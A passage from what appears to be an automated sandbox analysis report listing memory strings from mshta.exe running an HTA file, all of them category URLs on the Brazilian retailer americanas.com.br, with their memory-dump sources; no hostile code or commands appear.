00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos?chave=pfm_home_brinquedos_menu
Source: mshta.exe, 00000000.00000003.2676562635.000000000AA1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668493966.000000000C070000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764171931.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669539249.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654840614.000000000AA12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cama
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670707153.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.0000000009355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726617731.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=dk_hm_at_cameba
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=dk_hm_at_camebameta.largemeta.large.
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669963998.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=pfm_home_cameba_menu
Source: mshta.exe, 00000000.00000003.2676562635.000000000AA1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654840614.000000000AA12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cameras
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/cameras-e-drones?chave=pfm_home_cameras_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669963998.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/casa-e-construcao?chave=pfm_home_construcao_menu
Source: mshta.exe, 00000000.00000003.2676562635.000000000AA1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654840614.000000000AA12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/casam
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748463269.0000000009405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771342627.0000000009300000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/acessorios-para-celular?chave=pfm_hm
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773947173.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/celular-basico?chave=pfm_hm_tt_1_0_c
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668679539.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670707153.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.00000000093CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/pecas-para-celular?chave=pfm_hm_tt_1
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2721734384.0000000009A9B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642469328.0000000009A9B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/smartphone/iphone?ordenacao=topSelli
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727259266.0000000006EF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/smartphone?chave=pfm_hm_tt_1_0_smart
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670707153.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/smartwatch-e-smartband?chave=pfm_hm_
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=dk_hm_at_telefonia
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=dk_hm_at_telefoniameta.largeme
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=dk_hm_at_telefoniang
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 